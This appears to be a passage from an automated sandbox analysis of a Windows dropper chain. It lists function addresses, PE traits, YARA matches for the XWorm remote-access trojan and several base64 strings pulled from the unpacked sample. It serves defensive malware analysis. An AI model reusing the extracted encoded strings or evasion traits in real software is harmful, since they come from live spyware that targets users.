Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082B990	8_2_0082B990
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008381E4	8_2_008381E4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083B100	8_2_0083B100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083095E	8_2_0083095E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00866170	8_2_00866170
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082EA9D	8_2_0082EA9D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008512E0	8_2_008512E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082F3F0	8_2_0082F3F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00857B25	8_2_00857B25
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00849320	8_2_00849320
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083C375	8_2_0083C375
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00866400	8_2_00866400
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0086E550	8_2_0086E550
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00831D60	8_2_00831D60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0084DD70	8_2_0084DD70
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083BFAA	8_2_0083BFAA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00845090	8_2_00845090
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008440E0	8_2_008440E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008670E0	8_2_008670E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008508F0	8_2_008508F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0085500F	8_2_0085500F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00821040	8_2_00821040
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00860870	8_2_00860870
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0086A980	8_2_0086A980
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082C1A0	8_2_0082C1A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082C9A0	8_2_0082C9A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008581B4	8_2_008581B4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00841160	8_2_00841160
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083F169	8_2_0083F169
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00851973	8_2_00851973
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0084A2B0	8_2_0084A2B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0086DAF0	8_2_0086DAF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00865A00	8_2_00865A00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0086EA10	8_2_0086EA10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082A220	8_2_0082A220
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083222B	8_2_0083222B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083C74B	8_2_0083C74B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083FA6F	8_2_0083FA6F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00843382	8_2_00843382
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00844BB0	8_2_00844BB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0084D3C7	8_2_0084D3C7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008573DF	8_2_008573DF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0085F3DA	8_2_0085F3DA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00840BE1	8_2_00840BE1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0085A3E0	8_2_0085A3E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008443F0	8_2_008443F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00863BFA	8_2_00863BFA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00846B10	8_2_00846B10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00853343	8_2_00853343
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0085D348	8_2_0085D348
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083D361	8_2_0083D361
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00857C5D	8_2_00857C5D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0085FC90	8_2_0085FC90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0085E4A9	8_2_0085E4A9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00836CB7	8_2_00836CB7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083E4C2	8_2_0083E4C2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082C4D0	8_2_0082C4D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00849CE0	8_2_00849CE0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0084BCE9	8_2_0084BCE9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082B410	8_2_0082B410
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0082AC20	8_2_0082AC20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00843C40	8_2_00843C40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00830C50	8_2_00830C50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00843C57	8_2_00843C57
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00867450	8_2_00867450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00857C5F	8_2_00857C5F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00852C58	8_2_00852C58
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00844DC0	8_2_00844DC0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008375D3	8_2_008375D3
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008235D4	8_2_008235D4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00856DF0	8_2_00856DF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00827DFE	8_2_00827DFE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00860530	8_2_00860530
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0086ED50	8_2_0086ED50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00856560	8_2_00856560
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00859E9A	8_2_00859E9A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00823EC0	8_2_00823EC0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00828EC0	8_2_00828EC0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008546F0	8_2_008546F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00822780	8_2_00822780
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00858F82	8_2_00858F82
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00858F93	8_2_00858F93
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008247A2	8_2_008247A2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008447A0	8_2_008447A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008657A0	8_2_008657A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_008407F0	8_2_008407F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083DF2A	8_2_0083DF2A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083973C	8_2_0083973C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00858F44	8_2_00858F44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083C74B	8_2_0083C74B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00851760	8_2_00851760
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004B4047	14_2_004B4047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004761F0	14_2_004761F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004AC6DD	14_2_004AC6DD
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004A2C20	14_2_004A2C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004ACE69	14_2_004ACE69
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_00474EF0	14_2_00474EF0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004751A0	14_2_004751A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_00475450	14_2_00475450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_0049B4C0	14_2_0049B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_0049F6DB	14_2_0049F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004B18D7	14_2_004B18D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004B5CD4	14_2_004B5CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004B5DF4	14_2_004B5DF4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004761F0	15_2_004761F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_0047B700	15_2_0047B700
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004B4047	15_2_004B4047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004A2C20	15_2_004A2C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004ACE69	15_2_004ACE69
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00474EF0	15_2_00474EF0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004751A0	15_2_004751A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00475450	15_2_00475450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_0049B4C0	15_2_0049B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_0049F6DB	15_2_0049F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004B18D7	15_2_004B18D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004B5CD4	15_2_004B5CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004B5DF4	15_2_004B5DF4
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FDF0C0	19_2_00FDF0C0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FA6076	19_2_00FA6076
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FDA030	19_2_00FDA030
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FD6400	19_2_00FD6400
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9B990	19_2_00F9B990
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FA3183	19_2_00FA3183
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FBDD70	19_2_00FBDD70
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FA1D60	19_2_00FA1D60
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FA095E	19_2_00FA095E
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FDE550	19_2_00FDE550
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FC12E0	19_2_00FC12E0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9F3F0	19_2_00F9F3F0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FB9320	19_2_00FB9320
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FC08F0	19_2_00FC08F0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9C4D0	19_2_00F9C4D0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FA6CB7	19_2_00FA6CB7
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FA0C50	19_2_00FA0C50
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F91040	19_2_00F91040
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9AC20	19_2_00F9AC20
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9B410	19_2_00F9B410
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F97DFE	19_2_00F97DFE
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FC6DF0	19_2_00FC6DF0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FA75D3	19_2_00FA75D3
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F935D4	19_2_00F935D4
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FB4DC0	19_2_00FB4DC0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9C1A0	19_2_00F9C1A0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9C9A0	19_2_00F9C9A0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FC6560	19_2_00FC6560
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FC46F0	19_2_00FC46F0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FDDAF0	19_2_00FDDAF0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F93EC0	19_2_00F93EC0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F98EC0	19_2_00F98EC0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9EA9D	19_2_00F9EA9D
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FA222B	19_2_00FA222B
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F9A220	19_2_00F9A220
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FDEA10	19_2_00FDEA10
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FD5A00	19_2_00FD5A00
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F947A2	19_2_00F947A2
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FD57A0	19_2_00FD57A0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00F92780	19_2_00F92780
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 19_2_00FC1760	19_2_00FC1760

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: String function: 0082B210 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: String function: 0083B0F0 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00493F50 appears 408 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 004A0C53 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 004A844C appears 51 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 0049A570 appears 168 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 004761F0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 0049835C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00493040 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00499D21 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 004A2438 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: String function: 00F9A570 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: String function: 00F93F50 appears 136 times

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 924

Source: S2W2ftXM2b.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1911720 bytes, 2 files, at 0x2c +A "1s89v4.exe" +A "2X0520.exe", ID 1520, number 1, 112 datablocks, 0x1503 compression
Source: unicodedata.pyd.20.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: bPDDW9F.exe.15.dr	Static PE information: Number of sections : 11 > 10
Source: bPDDW9F[1].exe.15.dr	Static PE information: Number of sections : 11 > 10

Source: JCFx2xj.exe.15.dr	Static PE information: No import functions for PE file found
Source: JCFx2xj[1].exe.15.dr	Static PE information: No import functions for PE file found

Source: JCFx2xj.exe.15.dr	Static PE information: Data appended to the last section found
Source: JCFx2xj[1].exe.15.dr	Static PE information: Data appended to the last section found

Source: S2W2ftXM2b.exe

Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs S2W2ftXM2b.exe

Source: S2W2ftXM2b.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
Source: 34.2.d0HNrLB.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
Source: 33.2.d0HNrLB.exe.353e970.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8

Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: Section: ZLIB complexity 0.9984880767906336
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: Section: msqrvkkl ZLIB complexity 0.9940340802064497
Source: JqGBbm7[1].exe.15.dr	Static PE information: Section: ZLIB complexity 0.9981260557432432
Source: JqGBbm7.exe.15.dr	Static PE information: Section: ZLIB complexity 0.9981260557432432
Source: bPDDW9F[1].exe.15.dr	Static PE information: Section: .rsrc ZLIB complexity 0.995511451863354
Source: bPDDW9F.exe.15.dr	Static PE information: Section: .rsrc ZLIB complexity 0.995511451863354
Source: d0HNrLB[1].exe.15.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003601866883116
Source: d0HNrLB.exe.15.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003601866883116
Source: d0HNrLB.exe.26.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003601866883116
Source: d0HNrLB.exe0.26.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003601866883116

Source: d0HNrLB[1].exe.15.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB[1].exe.15.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB[1].exe.15.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe.15.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe.15.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe.15.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe.26.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe.26.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe.26.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe0.26.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe0.26.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: d0HNrLB.exe0.26.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Helper.cs

Base64 encoded string: 'PAIADzoWAl5YVFZ2UgohBRUIM0FDMj0vRj8qCx4DH0YZKUNAWSVSdhYKGghaKzcZQz4+Wj5/WiIBHRYDAR8BOgQOSWBKVl9cVFdjWks6JS4rGlZDHQQRA3Y9BhIGFU92LAYDHhMJOFVSRUNKRgUbBRAfE0luT01BQ0tfZE9NQFVP', 'PAIADzoWAl5YVFZ2UjQYAx4JIQlDPzlaUHhLWFE6EwhgTlhRFUxSf1okFA4RCXlIU0BdSldmS0M3BAgDMBUbXltJSGZUV0VaSEhgTVI=', 'PAIADzoWAl5YVFZ2Ui4QDhMIIhUQGVZaLzgOBh1NNwc1WiwiTSJGZ0o8QFglUX9aIgEdFgMBHwE6BA5JY0lUX15MRn4xKyUgNkp2FgoaCFohMxkIHkRaJT4IDBwIVVdnTU1BQ09fZUJNSF9aNTccAgMEVVNlTU1CWw==', 'PAIADzoWAl5YVFZ2UgohBRUIM0FDMj0vRj8qCx4DH0YZKUNAWyVUdhYKGghaKzcZQz4+Wj5/WiIBHRYDAR8BOgQOSWBKVl9cVFdjWks6JS4rGlZDHQQRA3Y9BhIGFU92LAYDHhMJOFVSR0NKRhsVARgBH0lnTyZAWUJGBRsFEB8TSWBKV19c', 'PAIADzoWAl5YVFZ2UjtAXEFGGhMNBBVaHm5MPEdZU0YXChMdCC0DNDEKBUJPVWFUUEdNUi0eLi49QVoKPxEGUSofBT0VSlEuEhQ5FwZeXEtReEpNRFRJXnhDUVE+GwA3CApeWElReElV', 'PAIADzoWAl5YVFZ2UgohDB5ddjkzJE01NXZLVi5aWgo/EQZRIBsFdjUwUTVTRhcKEx0ILQM0MQoFQkxWY1RSX1xPRn4xKyUgNkp2FgoaCFohMxkIHkRaMDMIEBgCFElnT01HTTcJNBMPFEJLUxNLV0lNKQcwGxEYQkxWYlRS'

Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, ToolBox.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, ToolBox.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@37/45@5/9

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

0_2_00CF3FEF

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

0_2_00CF1F90

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_00CF597D

